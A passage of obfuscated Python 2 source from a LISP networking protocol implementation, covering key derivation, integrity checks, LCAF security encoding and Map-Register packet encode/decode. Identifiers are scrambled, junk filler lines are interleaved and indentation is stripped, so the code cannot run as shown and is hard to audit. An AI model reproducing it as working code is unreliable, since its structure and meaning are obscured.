if 57 - 57: IiII % I11i * OOooOOo % I1ii11iIi11i
oooO0oO0 = ( iIIII11iII >> 128 ) & LISP_16_128_MASK
IIII1 = iIIII11iII & LISP_16_128_MASK
self . encrypt_key = lisp_hex_string ( oooO0oO0 ) . zfill ( 32 )
oo0Ooo00O0o = 32 if self . do_poly else 40
self . icv_key = lisp_hex_string ( IIII1 ) . zfill ( oo0Ooo00O0o )
if 45 - 45: OoO0O00 * OoooooooOO / O0 . I1Ii111 / OoOoOO00
if 53 - 53: OoOoOO00 . I1IiiI * I1ii11iIi11i
def do_icv ( self , packet , nonce ) :
if ( self . icv_key == None ) : return ( "" )
if ( self . do_poly ) :
Oo00 = self . icv . poly1305aes
I11Ii1I11IIIIi1 = self . icv . binascii . hexlify
nonce = I11Ii1I11IIIIi1 ( nonce )
ooOOo000 = Oo00 ( self . encrypt_key , self . icv_key , nonce , packet )
ooOOo000 = I11Ii1I11IIIIi1 ( ooOOo000 )
else :
ii1i1I1111ii = binascii . unhexlify ( self . icv_key )
ooOOo000 = hmac . new ( ii1i1I1111ii , packet , self . icv ) . hexdigest ( )
ooOOo000 = ooOOo000 [ 0 : 40 ]
if 77 - 77: I1IiiI / I1Ii111
return ( ooOOo000 )
if 65 - 65: I1ii11iIi11i * O0 . OoooooooOO * I11i / IiII
if 87 - 87: iIii1I11I1II1
def add_key_by_nonce ( self , nonce ) :
if ( lisp_crypto_keys_by_nonce . has_key ( nonce ) == False ) :
lisp_crypto_keys_by_nonce [ nonce ] = [ None , None , None , None ]
if 58 - 58: I1ii11iIi11i % i11iIiiIii + OoOoOO00 / I11i - OoooooooOO
lisp_crypto_keys_by_nonce [ nonce ] [ self . key_id ] = self
if 62 - 62: OoO0O00 . OoOoOO00
if 22 - 22: ooOoO0o . i11iIiiIii . OoooooooOO . i1IIi
def delete_key_by_nonce ( self , nonce ) :
if ( lisp_crypto_keys_by_nonce . has_key ( nonce ) == False ) : return
lisp_crypto_keys_by_nonce . pop ( nonce )
if 12 - 12: OoOoOO00 % OOooOOo + oO0o . O0 % iIii1I11I1II1
if 41 - 41: OoooooooOO
def add_key_by_rloc ( self , addr_str , encap ) :
I1I111i = lisp_crypto_keys_by_rloc_encap if encap else lisp_crypto_keys_by_rloc_decap
if 63 - 63: I1ii11iIi11i . I1IiiI + OOooOOo - IiII + iII111i
if 78 - 78: Ii1I
if ( I1I111i . has_key ( addr_str ) == False ) :
I1I111i [ addr_str ] = [ None , None , None , None ]
if 29 - 29: II111iiii
I1I111i [ addr_str ] [ self . key_id ] = self
if 79 - 79: iIii1I11I1II1 - i11iIiiIii + ooOoO0o - II111iiii . iIii1I11I1II1
if 84 - 84: Oo0Ooo % I11i * O0 * I11i
if 66 - 66: OOooOOo / iIii1I11I1II1 - OoOoOO00 % O0 . ooOoO0o
if 12 - 12: Oo0Ooo + I1IiiI
if 37 - 37: i1IIi * i11iIiiIii
if ( encap == False ) :
lisp_write_ipc_decap_key ( addr_str , I1I111i [ addr_str ] )
if 95 - 95: i11iIiiIii % I1Ii111 * Oo0Ooo + i1IIi . O0 + I1ii11iIi11i
if 7 - 7: OoO0O00 * i11iIiiIii * iIii1I11I1II1 / OOooOOo / I1Ii111
if 35 - 35: iII111i * OOooOOo
def encode_lcaf ( self , rloc_addr ) :
ooooO0OO0O = self . normalize_pub_key ( self . local_public_key )
IiI11 = self . key_length ( ooooO0OO0O )
iiIi = ( 6 + IiI11 + 2 )
if ( rloc_addr != None ) : iiIi += rloc_addr . addr_length ( )
if 84 - 84: iIii1I11I1II1 + I1ii11iIi11i
IIii1i = struct . pack ( "HBBBBHBB" , socket . htons ( LISP_AFI_LCAF ) , 0 , 0 ,
LISP_LCAF_SECURITY_TYPE , 0 , socket . htons ( iiIi ) , 1 , 0 )
if 77 - 77: i11iIiiIii - I1Ii111 . I1ii11iIi11i % Oo0Ooo . Ii1I
if 9 - 9: o0oOOo0O0Ooo
if 55 - 55: OOooOOo % iIii1I11I1II1 + I11i . ooOoO0o
if 71 - 71: i11iIiiIii / i1IIi + OoOoOO00
if 23 - 23: i11iIiiIii
if 88 - 88: II111iiii - iII111i / OoooooooOO
ii1IiIi1iIi = self . cipher_suite
IIii1i += struct . pack ( "BBH" , ii1IiIi1iIi , 0 , socket . htons ( IiI11 ) )
if 71 - 71: I1ii11iIi11i
if 19 - 19: Oo0Ooo - OoO0O00 + i11iIiiIii / iIii1I11I1II1
if 1 - 1: IiII % i1IIi
if 41 - 41: OoO0O00 * OoO0O00 / iII111i + I1ii11iIi11i . o0oOOo0O0Ooo
for IiIIi1IiiIiI in range ( 0 , IiI11 * 2 , 16 ) :
ii1i1I1111ii = int ( ooooO0OO0O [ IiIIi1IiiIiI : IiIIi1IiiIiI + 16 ] , 16 )
IIii1i += struct . pack ( "Q" , byte_swap_64 ( ii1i1I1111ii ) )
if 84 - 84: i11iIiiIii + OoO0O00 * I1IiiI + I1ii11iIi11i / Ii1I
if 80 - 80: I1ii11iIi11i
if 67 - 67: II111iiii
if 2 - 2: o0oOOo0O0Ooo - O0 * Ii1I % IiII
if 64 - 64: i1IIi . ooOoO0o
if ( rloc_addr ) :
IIii1i += struct . pack ( "H" , socket . htons ( rloc_addr . afi ) )
IIii1i += rloc_addr . pack_address ( )
if 7 - 7: oO0o . iII111i - iII111i / I1Ii111 % Oo0Ooo
return ( IIii1i )
if 61 - 61: oO0o - I1ii11iIi11i / iII111i % I1ii11iIi11i + OoO0O00 / Oo0Ooo
if 10 - 10: i11iIiiIii / OoOoOO00
def decode_lcaf ( self , packet , lcaf_len ) :
if 27 - 27: I1IiiI / OoooooooOO
if 74 - 74: I1ii11iIi11i % I1Ii111 - OoO0O00 * I11i . OoooooooOO * OoO0O00
if 99 - 99: OoOoOO00 . iII111i - OoooooooOO - O0
if 6 - 6: OOooOOo
if ( lcaf_len == 0 ) :
O00oO00oOO00O = "HHBBH"
ooOoooOoo0oO = struct . calcsize ( O00oO00oOO00O )
if ( len ( packet ) < ooOoooOoo0oO ) : return ( None )
if 3 - 3: O0 - I1Ii111 * Ii1I * OOooOOo / Ii1I
O000oOOoOOO , O0Ooo000OO00 , O000oo0O0OO0 , O0Ooo000OO00 , lcaf_len = struct . unpack ( O00oO00oOO00O , packet [ : ooOoooOoo0oO ] )
if 58 - 58: OoO0O00 - OoooooooOO . iII111i
if 26 - 26: OoOoOO00
if ( O000oo0O0OO0 != LISP_LCAF_SECURITY_TYPE ) :
packet = packet [ lcaf_len + 6 : : ]
return ( packet )
if 48 - 48: iII111i
lcaf_len = socket . ntohs ( lcaf_len )
packet = packet [ ooOoooOoo0oO : : ]
if 85 - 85: I1ii11iIi11i . oO0o . O0
if 16 - 16: I1ii11iIi11i % I1ii11iIi11i % I1Ii111 + I11i . I1Ii111 + OOooOOo
if 85 - 85: i11iIiiIii . I11i + Ii1I / Ii1I
if 43 - 43: IiII . OoooooooOO - II111iiii
if 90 - 90: I1IiiI - iIii1I11I1II1 + I1ii11iIi11i * OOooOOo * oO0o
if 19 - 19: I1Ii111 * II111iiii % Oo0Ooo - i1IIi
O000oo0O0OO0 = LISP_LCAF_SECURITY_TYPE
O00oO00oOO00O = "BBBBH"
ooOoooOoo0oO = struct . calcsize ( O00oO00oOO00O )
if ( len ( packet ) < ooOoooOoo0oO ) : return ( None )
if 27 - 27: OoOoOO00 . O0 / I1ii11iIi11i . iIii1I11I1II1
I11IIi , O0Ooo000OO00 , ii1IiIi1iIi , O0Ooo000OO00 , IiI11 = struct . unpack ( O00oO00oOO00O ,
packet [ : ooOoooOoo0oO ] )
if 51 - 51: i1IIi % o0oOOo0O0Ooo - oO0o - IiII
if 14 - 14: ooOoO0o + Ii1I
if 45 - 45: oO0o + II111iiii . iII111i / I1ii11iIi11i
if 76 - 76: Ii1I + iII111i - IiII * iIii1I11I1II1 % i1IIi
if 72 - 72: ooOoO0o + II111iiii . O0 - iII111i / OoooooooOO . I1Ii111
if 28 - 28: iIii1I11I1II1 . O0
packet = packet [ ooOoooOoo0oO : : ]
IiI11 = socket . ntohs ( IiI11 )
if ( len ( packet ) < IiI11 ) : return ( None )
if 32 - 32: OoooooooOO
if 29 - 29: I1ii11iIi11i
if 41 - 41: Ii1I
if 49 - 49: Ii1I % II111iiii . Ii1I - o0oOOo0O0Ooo - I11i * IiII
Iii = [ LISP_CS_25519_CBC , LISP_CS_25519_GCM , LISP_CS_25519_CHACHA ,
LISP_CS_1024 ]
if ( ii1IiIi1iIi not in Iii ) :
lprint ( "Cipher-suites {} supported, received {}" . format ( Iii ,
ii1IiIi1iIi ) )
packet = packet [ IiI11 : : ]
return ( packet )
if 52 - 52: iII111i % I1Ii111 - I1Ii111 - oO0o - iII111i - i1IIi
if 98 - 98: OoO0O00 - Oo0Ooo * I1IiiI
self . cipher_suite = ii1IiIi1iIi
if 90 - 90: I1IiiI
if 27 - 27: iIii1I11I1II1 - oO0o
if 73 - 73: OOooOOo . Oo0Ooo + Oo0Ooo % Oo0Ooo % O0
if 8 - 8: iII111i . Ii1I - i1IIi % OoO0O00 / I11i
if 13 - 13: Oo0Ooo / OoOoOO00 . I1ii11iIi11i . OOooOOo
ooooO0OO0O = 0
for IiIIi1IiiIiI in range ( 0 , IiI11 , 8 ) :
ii1i1I1111ii = byte_swap_64 ( struct . unpack ( "Q" , packet [ IiIIi1IiiIiI : IiIIi1IiiIiI + 8 ] ) [ 0 ] )
ooooO0OO0O <<= 64
ooooO0OO0O |= ii1i1I1111ii
if 31 - 31: o0oOOo0O0Ooo
self . remote_public_key = ooooO0OO0O
if 59 - 59: Oo0Ooo / Oo0Ooo
if 87 - 87: I1ii11iIi11i % OoOoOO00 + Ii1I . i11iIiiIii / Ii1I
if 32 - 32: Ii1I + IiII + I1ii11iIi11i
if 79 - 79: i1IIi / Ii1I
if 81 - 81: iIii1I11I1II1
if ( self . curve25519 ) :
ii1i1I1111ii = lisp_hex_string ( self . remote_public_key )
ii1i1I1111ii = ii1i1I1111ii . zfill ( 64 )
o000oO0oOOO = ""
for IiIIi1IiiIiI in range ( 0 , len ( ii1i1I1111ii ) , 2 ) :
o000oO0oOOO += chr ( int ( ii1i1I1111ii [ IiIIi1IiiIiI : IiIIi1IiiIiI + 2 ] , 16 ) )
if 23 - 23: OOooOOo
self . remote_public_key = o000oO0oOOO
if 68 - 68: OoooooooOO
if 18 - 18: Ii1I * OoO0O00
packet = packet [ IiI11 : : ]
return ( packet )
if 89 - 89: OoO0O00 + oO0o % iIii1I11I1II1 + I11i / O0
if 38 - 38: ooOoO0o - o0oOOo0O0Ooo - O0 + ooOoO0o % OoOoOO00 . o0oOOo0O0Ooo
if 40 - 40: iIii1I11I1II1 * OoooooooOO * I1Ii111 - Ii1I + i11iIiiIii
if 81 - 81: OoO0O00 * OoooooooOO / iII111i
if 8 - 8: O0 * i1IIi - OoOoOO00 % I1IiiI / I1ii11iIi11i
if 39 - 39: I1ii11iIi11i . oO0o * II111iiii + I1IiiI - iIii1I11I1II1
if 56 - 56: IiII - Ii1I + i11iIiiIii * OoO0O00 % I1IiiI
if 37 - 37: iIii1I11I1II1 + IiII / I1Ii111 . OoooooooOO
class lisp_thread ( ) :
def __init__ ( self , name ) :
self . thread_name = name
self . thread_number = - 1
self . number_of_pcap_threads = 0
self . number_of_worker_threads = 0
self . input_queue = Queue . Queue ( )
self . input_stats = lisp_stats ( )
self . lisp_packet = lisp_packet ( None )
if 72 - 72: oO0o % ooOoO0o % OOooOOo
if 63 - 63: OoO0O00 . Ii1I % II111iiii / I11i - OoOoOO00
if 4 - 4: Oo0Ooo - O0 / I11i + O0 - oO0o * Oo0Ooo
if 25 - 25: I1IiiI
if 64 - 64: oO0o
if 80 - 80: o0oOOo0O0Ooo % iIii1I11I1II1
if 63 - 63: IiII * i11iIiiIii
if 86 - 86: I11i % I11i - OoOoOO00 + I1Ii111 / I1IiiI * OoooooooOO
if 26 - 26: II111iiii * iII111i + o0oOOo0O0Ooo / O0 + i1IIi - I11i
if 56 - 56: OOooOOo
if 76 - 76: i1IIi % iIii1I11I1II1 - o0oOOo0O0Ooo + IiII - I11i
if 81 - 81: I1ii11iIi11i + OoooooooOO - OOooOOo * O0
if 100 - 100: iIii1I11I1II1 - OoOoOO00
if 28 - 28: Oo0Ooo . O0 . I11i
if 60 - 60: II111iiii + I1Ii111 / oO0o % OoooooooOO - i1IIi
if 57 - 57: ooOoO0o
if 99 - 99: Oo0Ooo + I1Ii111 % ooOoO0o - o0oOOo0O0Ooo
if 52 - 52: I1ii11iIi11i
class lisp_control_header ( ) :
def __init__ ( self ) :
self . type = 0
self . record_count = 0
self . nonce = 0
self . rloc_probe = False
self . smr_bit = False
self . smr_invoked_bit = False
self . ddt_bit = False
self . to_etr = False
self . to_ms = False
self . info_reply = False
if 93 - 93: iII111i . i11iIiiIii
if 24 - 24: OOooOOo . OoO0O00 + I1Ii111 . oO0o - I1ii11iIi11i % iII111i
def decode ( self , packet ) :
O00oO00oOO00O = "BBBBQ"
ooOoooOoo0oO = struct . calcsize ( O00oO00oOO00O )
if ( len ( packet ) < ooOoooOoo0oO ) : return ( False )
if 49 - 49: O0 . Oo0Ooo / Ii1I
II1IooOO00Oo , I11ii1i1I , i11IIii1I11 , self . record_count , self . nonce = struct . unpack ( O00oO00oOO00O , packet [ : ooOoooOoo0oO ] )
if 43 - 43: i11iIiiIii
if 65 - 65: O0 / iII111i . i1IIi * iII111i / iIii1I11I1II1 - oO0o
self . type = II1IooOO00Oo >> 4
if ( self . type == LISP_MAP_REQUEST ) :
self . smr_bit = True if ( II1IooOO00Oo & 0x01 ) else False
self . rloc_probe = True if ( II1IooOO00Oo & 0x02 ) else False
self . smr_invoked_bit = True if ( I11ii1i1I & 0x40 ) else False
if 93 - 93: OoOoOO00 % i11iIiiIii - Ii1I % OoO0O00
if ( self . type == LISP_ECM ) :
self . ddt_bit = True if ( II1IooOO00Oo & 0x04 ) else False
self . to_etr = True if ( II1IooOO00Oo & 0x02 ) else False
self . to_ms = True if ( II1IooOO00Oo & 0x01 ) else False
if 55 - 55: o0oOOo0O0Ooo . I1ii11iIi11i
if ( self . type == LISP_NAT_INFO ) :
self . info_reply = True if ( II1IooOO00Oo & 0x08 ) else False
if 63 - 63: oO0o
return ( True )
if 79 - 79: I1ii11iIi11i - oO0o - o0oOOo0O0Ooo . OOooOOo
if 65 - 65: i11iIiiIii . OoO0O00 % iII111i + IiII - i11iIiiIii
def is_info_request ( self ) :
return ( ( self . type == LISP_NAT_INFO and self . is_info_reply ( ) == False ) )
if 60 - 60: I1Ii111
if 14 - 14: Oo0Ooo % oO0o * iII111i - i11iIiiIii / I1ii11iIi11i * i11iIiiIii
def is_info_reply ( self ) :
return ( True if self . info_reply else False )
if 95 - 95: iIii1I11I1II1 + OoOoOO00 . I1IiiI + OoOoOO00 * I11i + OOooOOo
if 14 - 14: Ii1I - O0
def is_rloc_probe ( self ) :
return ( True if self . rloc_probe else False )
if 68 - 68: II111iiii - I1ii11iIi11i - OoO0O00 * iIii1I11I1II1 / I1IiiI * I1ii11iIi11i
if 45 - 45: I1Ii111 * I11i / iIii1I11I1II1 / I1IiiI % II111iiii
def is_smr ( self ) :
return ( True if self . smr_bit else False )
if 49 - 49: Ii1I / iII111i . iII111i . iII111i + i11iIiiIii % I11i
if 7 - 7: IiII * ooOoO0o + OoOoOO00
def is_smr_invoked ( self ) :
return ( True if self . smr_invoked_bit else False )
if 22 - 22: iII111i
if 48 - 48: I1ii11iIi11i . I1IiiI
def is_ddt ( self ) :
return ( True if self . ddt_bit else False )
if 73 - 73: O0 . I1Ii111 - OoooooooOO % I11i % i1IIi
if 14 - 14: I1Ii111 + Ii1I * Oo0Ooo
def is_to_etr ( self ) :
return ( True if self . to_etr else False )
if 49 - 49: Oo0Ooo
if 57 - 57: O0 * ooOoO0o - iII111i - iIii1I11I1II1 * iII111i
def is_to_ms ( self ) :
return ( True if self . to_ms else False )
if 9 - 9: IiII . I11i
if 23 - 23: O0 % OoooooooOO - O0 . I1IiiI + i11iIiiIii
if 96 - 96: ooOoO0o % O0
if 51 - 51: I1IiiI - iII111i / I1ii11iIi11i . I1ii11iIi11i + I1ii11iIi11i
if 87 - 87: II111iiii . Ii1I * OoO0O00
if 74 - 74: o0oOOo0O0Ooo % OoOoOO00 . iII111i % I1Ii111 . O0 % II111iiii
if 5 - 5: oO0o - OoooooooOO / OoOoOO00
if 30 - 30: I11i % o0oOOo0O0Ooo + i1IIi * OoooooooOO * OoO0O00 - II111iiii
if 55 - 55: OoO0O00
if 20 - 20: ooOoO0o * I1Ii111 * o0oOOo0O0Ooo - ooOoO0o
if 32 - 32: Ii1I * oO0o
if 85 - 85: i11iIiiIii . OoO0O00 + OoO0O00
if 28 - 28: Oo0Ooo
if 62 - 62: Oo0Ooo + OoooooooOO / iII111i
if 60 - 60: Ii1I / OoOoOO00 . I11i % OOooOOo
if 61 - 61: O0 . Ii1I . O0 * i11iIiiIii * II111iiii / I1Ii111
if 69 - 69: I11i
if 17 - 17: I11i
if 38 - 38: I1Ii111 % OOooOOo
if 9 - 9: O0 . iIii1I11I1II1
if 44 - 44: I1ii11iIi11i % IiII
if 6 - 6: OoO0O00
if 82 - 82: iIii1I11I1II1 . I11i / IiII / OOooOOo * II111iiii % oO0o
if 62 - 62: II111iiii
if 96 - 96: I11i % OoOoOO00 * I1ii11iIi11i
if 94 - 94: Oo0Ooo - i1IIi . O0 % Oo0Ooo . ooOoO0o
if 63 - 63: i11iIiiIii % I1ii11iIi11i % I1IiiI . IiII * o0oOOo0O0Ooo + OOooOOo
if 77 - 77: o0oOOo0O0Ooo
if 63 - 63: ooOoO0o * oO0o + ooOoO0o * Ii1I + Oo0Ooo / I1ii11iIi11i
if 15 - 15: O0 . I1ii11iIi11i * I1ii11iIi11i
if 65 - 65: I1Ii111 + O0 % o0oOOo0O0Ooo
if 72 - 72: OOooOOo . OoOoOO00 / II111iiii
if 69 - 69: OOooOOo * II111iiii - ooOoO0o - i1IIi + i11iIiiIii
if 50 - 50: OoooooooOO * i1IIi / oO0o
if 83 - 83: i1IIi
if 38 - 38: OoooooooOO * iIii1I11I1II1
if 54 - 54: OoooooooOO . I1Ii111
if 71 - 71: Ii1I
if 31 - 31: I11i . i11iIiiIii . OoO0O00 * Oo0Ooo % Ii1I . o0oOOo0O0Ooo
if 92 - 92: OoooooooOO / O0 * i1IIi + iIii1I11I1II1
if 93 - 93: ooOoO0o % I1Ii111
if 46 - 46: I1ii11iIi11i * OoOoOO00 * IiII * I1ii11iIi11i . I1ii11iIi11i
if 43 - 43: ooOoO0o . i1IIi
if 68 - 68: IiII % Oo0Ooo . O0 - OoOoOO00 + I1ii11iIi11i . i11iIiiIii
if 45 - 45: I1IiiI
if 17 - 17: OoooooooOO - ooOoO0o + Ii1I . OoooooooOO % Oo0Ooo
if 92 - 92: I1Ii111 - OOooOOo % OoO0O00 - o0oOOo0O0Ooo % i1IIi
if 38 - 38: I1ii11iIi11i . I11i / OoOoOO00 % I11i
if 10 - 10: O0 . I1IiiI * o0oOOo0O0Ooo / iII111i
class lisp_map_register ( ) :
def __init__ ( self ) :
self . proxy_reply_requested = False
self . lisp_sec_present = False
self . xtr_id_present = False
self . map_notify_requested = False
self . mobile_node = False
self . merge_register_requested = False
self . use_ttl_for_timeout = False
self . map_register_refresh = False
self . record_count = 0
self . nonce = 0
self . alg_id = 0
self . key_id = 0
self . auth_len = 0
self . auth_data = 0
self . xtr_id = 0
self . site_id = 0
self . record_count = 0
self . sport = 0
self . encrypt_bit = 0
self . encryption_key_id = None
if 61 - 61: Oo0Ooo - I1Ii111
if 51 - 51: iII111i * ooOoO0o / O0 / O0
def print_map_register ( self ) :
oooOOOO0oOo = lisp_hex_string ( self . xtr_id )
if 26 - 26: II111iiii + i1IIi
oOOo0ooO0 = ( "{} -> flags: {}{}{}{}{}{}{}{}{}, record-count: " +
"{}, nonce: 0x{}, key/alg-id: {}/{}{}, auth-len: {}, xtr-id: " +
"0x{}, site-id: {}" )
if 14 - 14: iIii1I11I1II1 - ooOoO0o + oO0o + i11iIiiIii / iIii1I11I1II1
lprint ( oOOo0ooO0 . format ( bold ( "Map-Register" , False ) , "P" if self . proxy_reply_requested else "p" ,
# i11iIiiIii . O0 / OOooOOo * i1IIi
"S" if self . lisp_sec_present else "s" ,
"I" if self . xtr_id_present else "i" ,
"T" if self . use_ttl_for_timeout else "t" ,
"R" if self . merge_register_requested else "r" ,
"M" if self . mobile_node else "m" ,
"N" if self . map_notify_requested else "n" ,
"F" if self . map_register_refresh else "f" ,
"E" if self . encrypt_bit else "e" ,
self . record_count , lisp_hex_string ( self . nonce ) , self . key_id ,
self . alg_id , " (sha1)" if ( self . key_id == LISP_SHA_1_96_ALG_ID ) else ( " (sha2)" if ( self . key_id == LISP_SHA_256_128_ALG_ID ) else "" ) , self . auth_len , oooOOOO0oOo , self . site_id ) )
if 14 - 14: IiII + IiII . I11i / Ii1I . iIii1I11I1II1
if 10 - 10: II111iiii . OOooOOo / iII111i
if 35 - 35: iII111i / Oo0Ooo + O0 * iIii1I11I1II1 - O0
if 3 - 3: I1ii11iIi11i
def encode ( self ) :
ooo0OOoo = ( LISP_MAP_REGISTER << 28 ) | self . record_count
if ( self . proxy_reply_requested ) : ooo0OOoo |= 0x08000000
if ( self . lisp_sec_present ) : ooo0OOoo |= 0x04000000
if ( self . xtr_id_present ) : ooo0OOoo |= 0x02000000
if ( self . map_register_refresh ) : ooo0OOoo |= 0x1000
if ( self . use_ttl_for_timeout ) : ooo0OOoo |= 0x800
if ( self . merge_register_requested ) : ooo0OOoo |= 0x400
if ( self . mobile_node ) : ooo0OOoo |= 0x200
if ( self . map_notify_requested ) : ooo0OOoo |= 0x100
if ( self . encryption_key_id != None ) :
ooo0OOoo |= 0x2000
ooo0OOoo |= self . encryption_key_id << 14
if 42 - 42: I11i % Oo0Ooo + IiII - I11i . iIii1I11I1II1 - Ii1I
if 27 - 27: iII111i % Oo0Ooo . I1ii11iIi11i . i1IIi % OoOoOO00 . o0oOOo0O0Ooo
if 37 - 37: iII111i + I1Ii111 * Ii1I + IiII
if 39 - 39: O0 * Oo0Ooo - I1IiiI + Ii1I / II111iiii
if 66 - 66: ooOoO0o + oO0o % OoooooooOO
if ( self . alg_id == LISP_NONE_ALG_ID ) :
self . auth_len = 0
else :
if ( self . alg_id == LISP_SHA_1_96_ALG_ID ) :
self . auth_len = LISP_SHA1_160_AUTH_DATA_LEN
if 23 - 23: oO0o . OoOoOO00 + iIii1I11I1II1
if ( self . alg_id == LISP_SHA_256_128_ALG_ID ) :
self . auth_len = LISP_SHA2_256_AUTH_DATA_LEN
if 17 - 17: IiII
if 12 - 12: i1IIi . OoO0O00
if 14 - 14: OOooOOo + II111iiii % OOooOOo . oO0o * ooOoO0o
IIii1i = struct . pack ( "I" , socket . htonl ( ooo0OOoo ) )
IIii1i += struct . pack ( "QBBH" , self . nonce , self . key_id , self . alg_id ,
socket . htons ( self . auth_len ) )
if 54 - 54: ooOoO0o * I11i - I1Ii111
IIii1i = self . zero_auth ( IIii1i )
return ( IIii1i )
if 15 - 15: iII111i / O0
if 61 - 61: i1IIi / i1IIi + ooOoO0o . I1Ii111 * ooOoO0o
def zero_auth ( self , packet ) :
OoO00oo00 = struct . calcsize ( "I" ) + struct . calcsize ( "QHH" )
iIi11i = ""
IIII1II11Iii = 0
if ( self . alg_id == LISP_NONE_ALG_ID ) : return ( packet )
if ( self . alg_id == LISP_SHA_1_96_ALG_ID ) :
iIi11i = struct . pack ( "QQI" , 0 , 0 , 0 )
IIII1II11Iii = struct . calcsize ( "QQI" )
if 46 - 46: Ii1I * Ii1I / oO0o * I1Ii111
if ( self . alg_id == LISP_SHA_256_128_ALG_ID ) :
iIi11i = struct . pack ( "QQQQ" , 0 , 0 , 0 , 0 )
IIII1II11Iii = struct . calcsize ( "QQQQ" )
if 37 - 37: OoOoOO00 + IiII
packet = packet [ 0 : OoO00oo00 ] + iIi11i + packet [ OoO00oo00 + IIII1II11Iii : : ]
return ( packet )
if 40 - 40: o0oOOo0O0Ooo - O0 * II111iiii / I1IiiI . o0oOOo0O0Ooo + I1Ii111
if 58 - 58: I1Ii111 * O0 / Ii1I + I1IiiI - I1ii11iIi11i * Oo0Ooo
def encode_auth ( self , packet ) :
OoO00oo00 = struct . calcsize ( "I" ) + struct . calcsize ( "QHH" )
IIII1II11Iii = self . auth_len
iIi11i = self . auth_data
packet = packet [ 0 : OoO00oo00 ] + iIi11i + packet [ OoO00oo00 + IIII1II11Iii : : ]
return ( packet )
if 85 - 85: i1IIi * OoOoOO00
if 99 - 99: Oo0Ooo
def decode ( self , packet ) :
OO0o0 = packet
O00oO00oOO00O = "I"
ooOoooOoo0oO = struct . calcsize ( O00oO00oOO00O )
if ( len ( packet ) < ooOoooOoo0oO ) : return ( [ None , None ] )
if 96 - 96: i1IIi - I1Ii111 * I1IiiI % I1IiiI
ooo0OOoo = struct . unpack ( O00oO00oOO00O , packet [ : ooOoooOoo0oO ] )
ooo0OOoo = socket . ntohl ( ooo0OOoo [ 0 ] )
packet = packet [ ooOoooOoo0oO : : ]
if 31 - 31: I1ii11iIi11i . Ii1I / ooOoO0o / i11iIiiIii % o0oOOo0O0Ooo
O00oO00oOO00O = "QBBH"
ooOoooOoo0oO = struct . calcsize ( O00oO00oOO00O )
if ( len ( packet ) < ooOoooOoo0oO ) : return ( [ None , None ] )
if 69 - 69: I1Ii111
self . nonce , self . key_id , self . alg_id , self . auth_len = struct . unpack ( O00oO00oOO00O , packet [ : ooOoooOoo0oO ] )
if 83 - 83: iIii1I11I1II1 . o0oOOo0O0Ooo + I1Ii111 . OoooooooOO / ooOoO0o + II111iiii
if 90 - 90: Ii1I * iII111i / OOooOOo
self . auth_len = socket . ntohs ( self . auth_len )
self . proxy_reply_requested = True if ( ooo0OOoo & 0x08000000 ) else False
if 68 - 68: OoOoOO00
self . lisp_sec_present = True if ( ooo0OOoo & 0x04000000 ) else False
self . xtr_id_present = True if ( ooo0OOoo & 0x02000000 ) else False
self . use_ttl_for_timeout = True if ( ooo0OOoo & 0x800 ) else False
self . map_register_refresh = True if ( ooo0OOoo & 0x1000 ) else False
self . merge_register_requested = True if ( ooo0OOoo & 0x400 ) else False
self . mobile_node = True if ( ooo0OOoo & 0x200 ) else False
self . map_notify_requested = True if ( ooo0OOoo & 0x100 ) else False
self . record_count = ooo0OOoo & 0xff
if 65 - 65: oO0o
if 82 - 82: o0oOOo0O0Ooo
if 80 - 80: i1IIi % OoOoOO00 + OoO0O00 - OoooooooOO / iIii1I11I1II1 + I1Ii111
if 65 - 65: Ii1I
self . encrypt_bit = True if ooo0OOoo & 0x2000 else False
if ( self . encrypt_bit ) :
self . encryption_key_id = ( ooo0OOoo >> 14 ) & 0x7
if 71 - 71: I1Ii111 % I1Ii111 . oO0o + i11iIiiIii - i11iIiiIii
if 16 - 16: iIii1I11I1II1 / I1IiiI / I1Ii111 - i11iIiiIii . ooOoO0o / OOooOOo
if 13 - 13: o0oOOo0O0Ooo % O0 - I1Ii111 * OoooooooOO / Oo0Ooo - OoooooooOO
if 78 - 78: oO0o % OoooooooOO
if 73 - 73: I1IiiI % ooOoO0o % IiII + i1IIi - OoooooooOO / oO0o
if ( self . xtr_id_present ) :
if ( self . decode_xtr_id ( OO0o0 ) == False ) : return ( [ None , None ] )
if 78 - 78: OoooooooOO % oO0o - i11iIiiIii
if 37 - 37: IiII % Ii1I % i1IIi
packet = packet [ ooOoooOoo0oO : : ]
if 23 - 23: ooOoO0o - O0 + i11iIiiIii
if 98 - 98: OoooooooOO
if 61 - 61: o0oOOo0O0Ooo . IiII . O0 + OoooooooOO + O0
if 65 - 65: i1IIi * OOooOOo * OoooooooOO - IiII . iII111i - OoO0O00
if ( self . auth_len != 0 ) :
if ( len ( packet ) < self . auth_len ) : return ( [ None , None ] )
if 71 - 71: Ii1I * OoOoOO00
if ( self . alg_id not in ( LISP_NONE_ALG_ID , LISP_SHA_1_96_ALG_ID ,
LISP_SHA_256_128_ALG_ID ) ) :
lprint ( "Invalid authentication alg-id: {}" . format ( self . alg_id ) )
return ( [ None , None ] )
if 33 - 33: i1IIi . i1IIi * OoooooooOO % I1Ii111 * o0oOOo0O0Ooo
if 64 - 64: ooOoO0o / ooOoO0o + I1ii11iIi11i * OOooOOo % OOooOOo
IIII1II11Iii = self . auth_len
if ( self . alg_id == LISP_SHA_1_96_ALG_ID ) :
ooOoooOoo0oO = struct . calcsize ( "QQI" )
if ( IIII1II11Iii < ooOoooOoo0oO ) :
lprint ( "Invalid sha1-96 authentication length" )
return ( [ None , None ] )
if 87 - 87: OoO0O00 * Oo0Ooo
OoO0o00O0oOOo , ooO , I1IiiIiIIi1Ii = struct . unpack ( "QQI" , packet [ : IIII1II11Iii ] )
oo00oo = ""
elif ( self . alg_id == LISP_SHA_256_128_ALG_ID ) :
ooOoooOoo0oO = struct . calcsize ( "QQQQ" )
if ( IIII1II11Iii < ooOoooOoo0oO ) :
lprint ( "Invalid sha2-256 authentication length" )
return ( [ None , None ] )
if 57 - 57: OOooOOo * OoO0O00 + O0 % I1Ii111 - I1IiiI
OoO0o00O0oOOo , ooO , I1IiiIiIIi1Ii , oo00oo = struct . unpack ( "QQQQ" ,
packet [ : IIII1II11Iii ] )
else :
lprint ( "Unsupported authentication alg-id value {}" . format ( self . alg_id ) )
if 43 - 43: I1Ii111
return ( [ None , None ] )
if 10 - 10: i1IIi - o0oOOo0O0Ooo / OoooooooOO + i11iIiiIii + iIii1I11I1II1
self . auth_data = lisp_concat_auth_data ( self . alg_id , OoO0o00O0oOOo , ooO ,
I1IiiIiIIi1Ii , oo00oo )
OO0o0 = self . zero_auth ( OO0o0 )
